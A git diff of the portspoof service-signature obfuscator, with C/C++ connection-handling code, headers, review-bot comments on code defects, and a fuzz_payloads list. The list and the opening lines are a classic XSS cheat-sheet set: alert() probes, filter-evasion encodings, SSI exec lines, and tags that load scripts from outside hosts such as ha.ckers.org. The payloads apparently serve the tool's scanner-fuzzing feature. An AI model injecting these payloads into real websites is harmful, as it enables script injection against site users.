<IMG SRC="mocha:[code]">
|
||||
<IMG SRC="livescript:[code]">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
BIN
src/src/a.out
Executable file
BIN
src/src/a.out
Executable file
Binary file not shown.
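--- /dev/null
+++ b/src/src/a.out.dSYM/Contents/Info.plist
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+<key>CFBundleDevelopmentRegion</key>
+<string>English</string>
+<key>CFBundleIdentifier</key>
+<string>com.apple.xcode.dsym.a.out</string>
+<key>CFBundleInfoDictionaryVersion</key>
+<string>6.0</string>
+<key>CFBundlePackageType</key>
+<string>dSYM</string>
+<key>CFBundleSignature</key>
+<string>????</string>
+<key>CFBundleShortVersionString</key>
+<string>1.0</string>
+<key>CFBundleVersion</key>
+<string>1</string>
+</dict>
+</plist>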
BIN
src/src/a.out.dSYM/Contents/Resources/DWARF/a.out
Normal file
BIN
src/src/a.out.dSYM/Contents/Resources/DWARF/a.out
Normal file
Binary file not shown.
116
src/src/config.h.in
Normal file
116
src/src/config.h.in
Normal file
@ -0,0 +1,116 @@
|
||||
/* src/config.h.in. Generated from configure.in by autoheader. */
|
||||
|
||||
/* Define to 1 if you have the <fcntl.h> header file. */
|
||||
#undef HAVE_FCNTL_H
|
||||
|
||||
/* Define to 1 if you have the `inet_ntoa' function. */
|
||||
#undef HAVE_INET_NTOA
|
||||
|
||||
/* Define to 1 if you have the <inttypes.h> header file. */
|
||||
#undef HAVE_INTTYPES_H
|
||||
|
||||
/* Define to 1 if you have the <limits.h> header file. */
|
||||
#undef HAVE_LIMITS_H
|
||||
|
||||
/* Define to 1 if your system has a GNU libc compatible `malloc' function, and
|
||||
to 0 otherwise. */
|
||||
#undef HAVE_MALLOC
|
||||
|
||||
/* Define to 1 if you have the <memory.h> header file. */
|
||||
#undef HAVE_MEMORY_H
|
||||
|
||||
/* Define to 1 if you have the `memset' function. */
|
||||
#undef HAVE_MEMSET
|
||||
|
||||
/* Define to 1 if you have the <netdb.h> header file. */
|
||||
#undef HAVE_NETDB_H
|
||||
|
||||
/* Define to 1 if you have the <netinet/in.h> header file. */
|
||||
#undef HAVE_NETINET_IN_H
|
||||
|
||||
/* Define to 1 if you have the `socket' function. */
|
||||
#undef HAVE_SOCKET
|
||||
|
||||
/* Define to 1 if you have the <stdint.h> header file. */
|
||||
#undef HAVE_STDINT_H
|
||||
|
||||
/* Define to 1 if you have the <stdlib.h> header file. */
|
||||
#undef HAVE_STDLIB_H
|
||||
|
||||
/* Define to 1 if you have the <strings.h> header file. */
|
||||
#undef HAVE_STRINGS_H
|
||||
|
||||
/* Define to 1 if you have the <string.h> header file. */
|
||||
#undef HAVE_STRING_H
|
||||
|
||||
/* Define to 1 if you have the <syslog.h> header file. */
|
||||
#undef HAVE_SYSLOG_H
|
||||
|
||||
/* Define to 1 if you have the <sys/ioctl.h> header file. */
|
||||
#undef HAVE_SYS_IOCTL_H
|
||||
|
||||
/* Define to 1 if you have the <sys/socket.h> header file. */
|
||||
#undef HAVE_SYS_SOCKET_H
|
||||
|
||||
/* Define to 1 if you have the <sys/stat.h> header file. */
|
||||
#undef HAVE_SYS_STAT_H
|
||||
|
||||
/* Define to 1 if you have the <sys/timeb.h> header file. */
|
||||
#undef HAVE_SYS_TIMEB_H
|
||||
|
||||
/* Define to 1 if you have the <sys/types.h> header file. */
|
||||
#undef HAVE_SYS_TYPES_H
|
||||
|
||||
/* Define to 1 if you have <sys/wait.h> that is POSIX.1 compatible. */
|
||||
#undef HAVE_SYS_WAIT_H
|
||||
|
||||
/* Define to 1 if you have the <unistd.h> header file. */
|
||||
#undef HAVE_UNISTD_H
|
||||
|
||||
/* This is a Linux system */
|
||||
#undef LINUX
|
||||
|
||||
/* Define to 1 if your C compiler doesn't accept -c and -o together. */
|
||||
#undef NO_MINUS_C_MINUS_O
|
||||
|
||||
/* This is an OpenBSD system */
|
||||
#undef OPENBSD
|
||||
|
||||
/* Name of package */
|
||||
#undef PACKAGE
|
||||
|
||||
/* Define to the address where bug reports for this package should be sent. */
|
||||
#undef PACKAGE_BUGREPORT
|
||||
|
||||
/* Define to the full name of this package. */
|
||||
#undef PACKAGE_NAME
|
||||
|
||||
/* Define to the full name and version of this package. */
|
||||
#undef PACKAGE_STRING
|
||||
|
||||
/* Define to the one symbol short name of this package. */
|
||||
#undef PACKAGE_TARNAME
|
||||
|
||||
/* Define to the version of this package. */
|
||||
#undef PACKAGE_VERSION
|
||||
|
||||
/* This is a BSD system */
|
||||
#undef SOMEBSD
|
||||
|
||||
/* Define to 1 if you have the ANSI C header files. */
|
||||
#undef STDC_HEADERS
|
||||
|
||||
/* Version number of package */
|
||||
#undef VERSION
|
||||
|
||||
/* Use GNU source */
|
||||
#undef _GNU_SOURCE
|
||||
|
||||
/* Define to empty if `const' does not conform to ANSI C. */
|
||||
#undef const
|
||||
|
||||
/* Define to rpl_malloc if the replacement function should be used. */
|
||||
#undef malloc
|
||||
|
||||
/* Define to `unsigned int' if <sys/types.h> does not define. */
|
||||
#undef size_t
|
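--- /dev/null
+++ b/src/src/config_file.c
@@ -0,0 +1,39 @@
+
+
+
+char * get_substring_value(char* str)
+{
+int i=0;
+int soffset=-1,eoffset=-1;
+for(i;i<strlen(str);i++)
+{
+if(str[i]=='"')
+{
+
+if(soffset==-1)
+soffset=i;
+else if(eoffset==-1)
+{
+eoffset=i;
+break;
+}
+else
+{
+printf("Error in configuration file1");
+exit(1);
+}
+}
+}
+
+if(soffset==-1 || eoffset==-1)
+{
+printf("Error in configuration file2");
+exit(1);
+}
+
+char *substr=malloc(eoffset-soffset);
+memset(substr,0,eoffset-soffset);
+memcpy(substr,str+soffset+1,eoffset-soffset-1);
+return substr;
+}
+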
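Review bot: The pointer returned by `malloc(eoffset-soffset)` goes straight into `memset` with no NULL check, so an allocation failure while parsing the configuration file becomes a NULL write instead of a clean exit. A guard such as `if (substr == NULL) { perror("malloc"); exit(1); }` right after the allocation would fix that. The file as added has no `#include` lines at all, so `malloc`, `strlen`, `memcpy`, `printf` and `exit` are used undeclared. An implicitly declared `malloc` is assumed to return `int`, which can truncate the pointer on 64-bit targets, so the file should include stdio.h, stdlib.h and string.h. The final `else` that prints "Error in configuration file1" is unreachable, because the `else if(eoffset==-1)` before it always matches once `soffset` is set and then breaks out of the loop.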
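--- /dev/null
+++ b/src/src/config_file.h
@@ -0,0 +1,6 @@
+
+
+
+
+int process_config_file(struct signature **arr_lines2,int* signatures,int num_lines, char* config_file);
+char *get_substring_value(char* str);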
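Review bot: This header has no include guard, and it first names `struct signature` inside the parameter list of `process_config_file`. Unless an earlier include already declares that type, it is scoped to the prototype alone and will not match the `struct signature` the caller passes. I would wrap the file in `#ifndef CONFIG_FILE_H` / `#define CONFIG_FILE_H` … `#endif` and put a forward declaration `struct signature;` before the prototype. A short comment on `get_substring_value` stating that the caller must `free()` the returned buffer would also help, since the definition in config_file.c allocates it with `malloc`.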
257
src/src/connection.cpp
Normal file
257
src/src/connection.cpp
Normal file
@ -0,0 +1,257 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
|
||||
|
||||
#include <pthread.h>
|
||||
#include <sys/param.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <time.h>
|
||||
#include "threads.h"
|
||||
#include "connection.h"
|
||||
#include "log.h"
|
||||
#include "Configuration.h"
|
||||
|
||||
Thread threads[MAX_THREADS];
|
||||
|
||||
|
||||
void nonblock(int sockfd)
|
||||
{
|
||||
int opts;
|
||||
opts = fcntl(sockfd, F_GETFL);
|
||||
if(opts < 0)
|
||||
{
|
||||
perror("fcntl(F_GETFL)\n");
|
||||
exit(1);
|
||||
}
|
||||
opts = (opts | O_NONBLOCK);
|
||||
if(fcntl(sockfd, F_SETFL, opts) < 0)
|
||||
{
|
||||
perror("fcntl(F_SETFL)\n");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
void* process_connection(void *arg)
|
||||
{
|
||||
int tid = *((int*)(&arg));
|
||||
//int len;
|
||||
string str;
|
||||
char buffer;
|
||||
int original_port=DEFAULT_PORT;
|
||||
int n = 0;
|
||||
time_t timestamp;
|
||||
struct sockaddr_in peer_sockaddr;
|
||||
int peer_sockaddr_len=sizeof(struct sockaddr_in);
|
||||
char* msg;
|
||||
|
||||
while(1) {
|
||||
|
||||
sleep(1);
|
||||
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
{
|
||||
|
||||
if(threads[tid].clients[i] != 0)
|
||||
{
|
||||
|
||||
timestamp = time(NULL);
|
||||
|
||||
if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
|
||||
n = 1; // just reply...
|
||||
else
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
|
||||
|
||||
// deal with different recv buffer size
|
||||
if(n == 0){
|
||||
|
||||
#ifdef OSX
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
#else
|
||||
|
||||
if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*) (socklen_t*) &peer_sockaddr_len )){
|
||||
perror("Getsockopt failed");
|
||||
goto close_socket;
|
||||
}
|
||||
else
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
|
||||
#endif
|
||||
|
||||
//LOG
|
||||
msg=(char*)malloc(MAX_LOG_MSG_LEN);
|
||||
memset(msg,0,MAX_LOG_MSG_LEN);
|
||||
snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
|
||||
log_write(msg);
|
||||
free(msg);
|
||||
//
|
||||
|
||||
close_socket:
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
fprintf(stdout,"Thread nr. %d : client %d closed connection\n",tid, threads[tid].clients[i]);
|
||||
|
||||
close(threads[tid].clients[i]);
|
||||
|
||||
pthread_mutex_lock(&new_connection_mutex);
|
||||
threads[tid].clients[i] = 0;
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
else if(n < 0){
|
||||
|
||||
|
||||
if(errno == EAGAIN)
|
||||
{
|
||||
continue; // Nmap NULL probe (no data) -> skip && go to another socket (client)
|
||||
}
|
||||
else if(errno == 104) // Client terminted connection -> get rid of the socket now!
|
||||
{}
|
||||
else
|
||||
fprintf(stdout,"errno: %d\n", errno);
|
||||
|
||||
#ifdef OSX
|
||||
|
||||
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
|
||||
#else
|
||||
|
||||
if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*) &peer_sockaddr_len )){
|
||||
perror("Getsockopt failed");
|
||||
goto close_socket2;
|
||||
}
|
||||
else
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
|
||||
#endif
|
||||
|
||||
//LOG
|
||||
msg =(char*)malloc(MAX_LOG_MSG_LEN);
|
||||
memset(msg,0,MAX_LOG_MSG_LEN);
|
||||
snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
|
||||
log_write(msg);
|
||||
free(msg);
|
||||
//
|
||||
|
||||
close_socket2:
|
||||
close(threads[tid].clients[i]);
|
||||
|
||||
pthread_mutex_lock(&new_connection_mutex);
|
||||
threads[tid].clients[i] = 0;
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
|
||||
#ifdef OSX
|
||||
// BSD
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
//
|
||||
#else
|
||||
// Linux
|
||||
if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr, (socklen_t*) &peer_sockaddr_len ))
|
||||
perror("Getsockopt failed");
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
//
|
||||
#endif
|
||||
|
||||
//LOG
|
||||
char* msg=(char*)malloc(MAX_LOG_MSG_LEN);
|
||||
memset(msg,0,MAX_LOG_MSG_LEN);
|
||||
snprintf(msg,MAX_LOG_MSG_LEN,"%d # Service_probe # SIGNATURE_SEND # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
|
||||
log_write(msg);
|
||||
free(msg);
|
||||
//
|
||||
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
{
|
||||
fprintf(stdout,"\n---\nThread nr.%d for port %d \n", tid,original_port);
|
||||
}
|
||||
|
||||
std::vector<char> vectsignature=configuration->mapPort2Signature(original_port);
|
||||
|
||||
int buffertosendsize=vectsignature.size();
|
||||
char* buffertosend= (char*)malloc(buffertosendsize);
|
||||
|
||||
for(int j=0; j<buffertosendsize;j++)
|
||||
buffertosend[j]=vectsignature[j];
|
||||
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
{
|
||||
|
||||
|
||||
fprintf(stdout,"signature sent -> ");
|
||||
for(int t=0;t<buffertosendsize;t++)
|
||||
{
|
||||
if(*(buffertosend+t)==0)
|
||||
fprintf(stdout,"\\00");
|
||||
else if(*(buffertosend+t)=='\n')
|
||||
fprintf(stdout,"\\n");
|
||||
else if(*(buffertosend+t)=='\r')
|
||||
fprintf(stdout,"\\r");
|
||||
else
|
||||
fprintf(stdout,"\\%x",*(buffertosend+t));
|
||||
}
|
||||
fprintf(stdout,"\n---\n");
|
||||
|
||||
}
|
||||
fflush(stdout);
|
||||
|
||||
|
||||
if(send(threads[tid].clients[i], buffertosend, buffertosendsize,0)==-1)
|
||||
perror("Send to socket failed");
|
||||
|
||||
close(threads[tid].clients[i]);
|
||||
|
||||
pthread_mutex_lock(&new_connection_mutex);
|
||||
threads[tid].clients[i] = 0;
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
else
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
}
|
||||
}
|
||||
}
|
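--- a/src/src/connection.h
+++ b/src/src/connection.h
@@ -0,0 +1,74 @@
+/*
+* portspoof Service signature obfucastor
+* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+*
+* This program is free software; you can redistribute it and/or modify it
+* under the terms of the GNU General Public License as published by the
+* Free Software Foundation; either version 2 of the License, or (at your
+* option) any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+* See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along
+* with this program; if not, see <http://www.gnu.org/licenses>.
+*
+* Linking portspoof statically or dynamically with other modules is making
+* a combined work based on portspoof. Thus, the terms and conditions of
+* the GNU General Public License cover the whole combination.
+*
+* In addition, as a special exception, the copyright holder of portspoof
+* gives you permission to combine portspoof with free software programs or
+* libraries that are released under the GNU LGPL. You may copy
+* and distribute such a system following the terms of the GNU GPL for
+* portspoof and the licenses of the other code concerned.
+*
+* Note that people who make modified versions of portspoof are not obligated
+* to grant this special exception for their modified versions; it is their
+* choice whether to do so. The GNU General Public License gives permission
+* to release a modified version without this exception; this exception
+* also makes it possible to release a modified version which carries
+* forward this exception.
+*/
+
+#include <pthread.h>
+#include "threads.h"
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <assert.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <netinet/in.h>
+#include <sys/sysctl.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <err.h>
+#include <errno.h>
+#include <stdio.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+
+#include "revregex.h"
+#include "Configuration.h"
+
+#define SO_ORIGINAL_DST 80
+#define TCPSTATES
+
+
+
+extern Thread threads[MAX_THREADS];
+
+class Configuration;
+extern Configuration* configuration;
+
+void nonblock(int sockfd);
+void* process_connection(void *arg);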
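Review bot: connection.h has no include guard, although it pulls in threads.h, revregex.h and Configuration.h and declares the shared `threads` array, so any second inclusion through another header re-processes all of it; add `#pragma once` (or an `#ifndef CONNECTION_H` guard) as the first line after the licence comment. The line `#define SO_ORIGINAL_DST 80` hard-codes the netfilter option number unconditionally, including for OSX builds where connection.cpp never passes it to getsockopt; wrapping it as `#ifndef SO_ORIGINAL_DST` / `#define SO_ORIGINAL_DST 80` / `#endif`, or taking it from `<linux/netfilter_ipv4.h>` on Linux, avoids a clash if a system header already provides it. The repeated `<sys/types.h>`, `<sys/socket.h>`, `<sys/stat.h>` and `<netinet/in.h>` includes can be reduced to one each, and `#define TCPSTATES` would benefit from a one-line comment saying which header it is meant to affect.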
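--- a/src/src/fuzz.txt
+++ b/src/src/fuzz.txt
@@ -0,0 +1,17 @@
+-> Reading fuzzing payloads from a file!
+Usage: portspoof [OPTION]...
+Portspoof - service signature obfuscator.
+
+-i bind to a user defined IP address
+-p bind to a user defined PORT number
+-s custom signture file
+-c configuration file
+-l log port scanning alerts to a file
+-d disable syslog
+-v be verbose
+-f read fuzz payload list
+-1 generate fuzzing payloads
+-n nmap wrap fuzz signatures
+-h display this help and exit
+
+Without any OPTION - use default values and continue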
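Review bot: fuzz.txt looks like captured program output rather than fuzz input: its first line is the status message `-> Reading fuzzing payloads from a file!` and the remaining lines match the usage text printed by Configuration::usage(). If it came from redirecting a test run, it probably should not be committed next to the real payload lists. If it is meant as a sample, a clearer name would keep it from being passed to `-f` as a payload file by mistake. The recorded usage text also carries the `signture` typo from the `-s` help line, which is worth fixing at the source string.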
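--- a/src/src/fuzz_nmap_signatures
+++ b/src/src/fuzz_nmap_signatures
@@ -0,0 +1,2 @@
+220 __FUZZ__ ESMTP OpenSMTPD\r\n
+550 4m2v4 (__FUZZ__)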
304
src/src/fuzz_payloads
Normal file
304
src/src/fuzz_payloads
Normal file
@ -0,0 +1,304 @@
|
||||
WOOT
|
||||
A
|
||||
0AAAAAAAAAAAAAAAAAA
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG%20SRC="javascript:alert('XSS');">
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert("XSS")>
|
||||
<IMG%20SRC=`javascript:alert("RSnake%20says,%20'XSS'")`>
|
||||
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG%206;avascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC=javascript:alert('XSS')>
|
||||
<IMG%20SRC="jav ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav	ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="jav
ascript:alert('XSS');">
|
||||
<IMG%20SRC="%20%20%20javascript:alert('XSS');">
|
||||
<SCRIPT/XSS%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG%20SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT%20TYPE="IMAGE"%20SRC="javascript:alert('XSS');">
|
||||
<BODY%20BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY%20ONLOAD=alert('XSS')>
|
||||
<IMG%20DYNSRC="javascript:alert('XSS')">
|
||||
<IMG%20LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND%20SRC="javascript:alert('XSS');">
|
||||
<BR%20SIZE="&{alert('XSS')}">
|
||||
<LAYER%20SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK%20REL="stylesheet"%20HREF="javascript:alert('XSS');">
|
||||
<LINK%20REL="stylesheet"%20HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<http://ha.ckers.org/xss.css>;%20REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG%20SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG%20SRC="mocha:[code]">
|
||||
<IMG%20SRC="livescript:[code]">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META%20HTTP-EQUIV="Link"%20Content="<javascript:alert('XSS')>;%20REL=stylesheet">
|
||||
<META%20HTTP-EQUIV="refresh"%20CONTENT="0;%20URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME%20SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE%20BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="background-image:%20url(javascript:alert('XSS'))">
|
||||
<DIV%20STYLE="width:%20expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG%20STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS%20STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS%20STYLE='no\xss:noxss("*//*");
|
||||
<STYLE%20TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A%20CLASS=XSS></A>
|
||||
<STYLE%20type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE%20HREF="javascript:alert('XSS');//">
|
||||
<OBJECT%20TYPE="text/x-scriptlet"%20DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param%20name=url%20value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML%20ID=I><X><C><![CDATA[<IMG%20SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML%20SRC="http://ha.ckers.org/xsstest.xml"%20ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT%20SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec%20cmd="/bin/echo%20'<SCRIPT%20SRC'"--><!--#exec%20cmd="/bin/echo%20'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<?%20echo('<SCR)';
|
||||
<META%20HTTP-EQUIV="Set-Cookie"%20Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META%20HTTP-EQUIV="CONTENT-TYPE"%20CONTENT="text/html;%20charset=UTF-7">%20</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT%20a=">"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=">"%20''%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20"a='>'"%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT%20a=`>`%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
'%20onmouseover=alert(/Black.Spook/)
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
x”</title><img%20src%3dx%20onerror%3dalert(1)>
|
||||
<script>%20document.getElementById(%22safe123%22).setCapture();%20document.getElementById(%22safe123%22).click();%20</script>
|
||||
